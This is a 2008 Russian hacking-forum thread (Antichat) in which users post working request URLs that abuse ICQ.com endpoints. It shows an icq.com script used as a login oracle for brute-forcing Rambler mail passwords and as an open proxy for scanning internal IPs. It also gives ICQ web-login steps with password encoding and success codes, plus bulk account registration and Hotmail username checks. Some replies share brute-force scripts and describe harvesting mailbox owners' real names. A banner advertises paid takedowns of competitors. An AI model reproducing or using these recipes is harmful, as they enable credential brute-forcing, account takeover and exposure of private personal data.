Форум АНТИЧАТ - Некоторые баги Icq.com

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Некоторые баги Icq.com

Опции темы

Поиск в этой теме

Опции просмотра

Некоторые баги Icq.com

02.06.2008, 16:47

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Некоторые баги Icq.com

К сути вопроса.
[php]
http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=5213 38
[php]
так показывает ошибку 404

PHP код:


		
			
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=521338

Так запрос выполняется нормально.
если выдаёт 1 то логин пасс верные если нет то 0.
таким образом можно написать брутфорсер.
Скрипт:

PHP код:


		
			
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=

является сам по себе вэб прокси сервером.
Те переходя по ссылке https://ips.icq.com/
мы емеем 404.

PHP код:


		
			
 https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=https://ips.icq.com

Всё ок.Нету форбиден.
можно проскалитть локалку

PHP код:


		
			
 https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://192.168.0.1



и так далее.

Можно приинклудить джава скрипт.

PHP код:


		
			
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=УРЛ_С_ДЖАВА_СКРИПТОМ

Ccылка на исходьник скрипта.

PHP код:


		
			
http://webfile.ru/1990419

Web-defence.ru

02.06.2008, 19:42

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

вот например красивий запрос

PHP код:


		
			
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://localhost

недавно розберал авторизацию на icq2go
то
после просмотра старого и доброго webicq я нашел метод авторизацеи
суть ево полягает в том что для начала мы берем сесию вот отсюда

PHP код:


		
			
http://bhm.icq.com/hello?locale=en&clver=8003&clid=Wicked%5FTester&trans=1001&event=1500&%5F%5FiClient=%5Bobject%20Object%5D

и получаем в ответ event=1510&session=2021799010%2dc754d546%2d2a05%2d 4e44%2d89df%2ddeae33557a14&trans=1001&server=64%2e 12%2e202%2e137&port=80&?

2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae3 3557a14- самая сесия
64.12.202.137 - адрес сервера

и когда мы узнали нашу сесию делаем запрос

PHP код:


		
			
http://64.12.202.137/data?session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&isicqemail=0&pass=DEDHFKDIHCFDGFHI&enc=1&status=0&sn=489801534&trans=1001&event=2000&%5F%5FiClient=%5Bobject%20Object%5D

обратите внимания на пароль!
пароль шифруеться, 1 символ заменяеться на 2
в файле char я привел почти все символи етой шифровкой !

если ответ мы получаем

PHP код:


		
			
event=2010&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&trans=1001&skey=713969121&sn=489801534&epass=1EGEJGMEKIEGFHHIK&?

значит пароль подошел

PHP код:


		
			
event=2010 - означает что пароль удачный

event=1000 - неправельный пароль

02.06.2008, 19:52

satana8920

Moderator - Level 7

Регистрация: 22.09.2006

Сообщений: 531

Провел на форуме:
3818187

Репутация: 369

Отправить сообщение для satana8920 с помощью ICQ

ChaaK мдяяяя
а вот еси я айсику брутер хочу написать вот для таких как ты блин?
что б проверялись парлли по HTTP

02.06.2008, 20:04

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Хоть кто-то понял тему.

302 ошибка

04.06.2008, 18:29

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

302 ошибка

Цитата:

Сообщение от ChaaK

И к чему это??
Простые методы узнавания правильный ли пароль. Нету тут багов, по крайней мере не встретилось.

А чо 302 ошибка уже не в моде?

опиши что за 302 ошибка

04.06.2008, 18:50

~~Piflit~~

Banned

Регистрация: 11.08.2006

Сообщений: 1,522

Провел на форуме:
5128756

Репутация: 2032

Отправить сообщение для Piflit с помощью ICQ

http://www.checkupdown.com/status/E302.html

04.06.2008, 19:18

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

набрасал на скорую руку скрипт для брута мыльников, через первую багу, если кому надо берите
http://dump.ru/file_catalog/417927

05.06.2008, 20:04

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

Провел на форуме:
2605910

Репутация: 212

бага шЫкарная
брут рамблер мыл с малым трафиком - штука крайне полезная

НО есть еще 1 применение первому урлу(https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=5213 38 )

открываем в бровзере и видим введенные при регистрации мыльника фамилию и имя владельца рамблер-мыла

я ввел в гугле mailto "@rambler." , проверил мыльники етим скриптом. Похоже, народ указывает в значительной части случаев реальные имя-фамилию

09.06.2008, 14:56

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Возможность "Авто-рега" icq номеров.

Код:

http://icq.atlas.cz/ClientRegistration/default.aspx?connectorId=_icqFlashConnector&validateAtlasUser=1

пост даные

PHP код:


		
			
uin=365286171&key=B800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D&password=a8n5xz&data=%3Cdata%3E%3Cfname%3E%3C%2Ffname%3E%3Clname%3E%3C%2Flname%3E%3CbYear%3E0%3C%2FbYear%3E%3CbMonth%3E0%3C%2FbMonth%3E%3CbDay%3E0%3C%2FbDay%3E%3Cgender%3E0%3C%2Fgender%3E%3Ccountry%3E-1%3C%2Fcountry%3E%3Ccity%3E%3C%2Fcity%3E%3Cstate%3E%3C%2Fstate%3E%3Ckey%3EB800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D%3C%2Fkey%3E%3Cuin%3E365286171%3C%2Fuin%3E%3Cpassword%3Ea8n5xz%3C%2Fpassword%3E%3Cemail%3E%3C%2Femail%3E%3Cnickname%3Exspider3%3C%2Fnickname%3E%3Cquestion%3EN%C3%A1zev+obl%C3%ADben%C3%A9+po%C4%8D%C3%ADta%C4%8Dov%C3%A9+hry%3F%3C%2Fquestion%3E%3Canswer%3Exspider+fghfgjhhg%3C%2Fanswer%3E%3CauthorizeAdd%3E%3C%2FauthorizeAdd%3E%3CauthorizeStatus%3E1%3C%2FauthorizeStatus%3E%3CrememberPass%3E1%3C%2FrememberPass%3E%3C%2Fdata%3E&username=<login>

нотмаил.ком чек на свободные мыла

Код:

https://signup.live.com/nexus.fpp?cnmn=Microsoft.Msn.MemberExperience.Nexus.NexusService.CheckAvailability&ptid=0&a=f9869bdc-a627-4a1e-8c06-f0f1b88923cf

PHP код:


		
			
[color=green]пост запрос[/color]

cn=Microsoft.Msn.MemberExperience.Nexus.NexusService&mn=CheckAvailability&d=[%22<login>%40<domain>%22],%22f9869bdc-a627-4a1e-8c06-f0f1b88923cf%22&v=1

если ответ 1006 знач мыло свободное

Web-Defence.ru

Последний раз редактировалось КВР; 09.06.2008 в 15:18..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Некоторые баги vkontakte.ru	lord_of_keyboard	Социальные сети	1510	17.06.2010 16:40
Icq# через Icq.com	Scipio	Авторские статьи	6	22.03.2008 06:11
Дефейс по быстрому. Баги на сервере. Админ не выставил права на папки	lexa	Комментарии к видео	2	31.01.2005 08:54

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход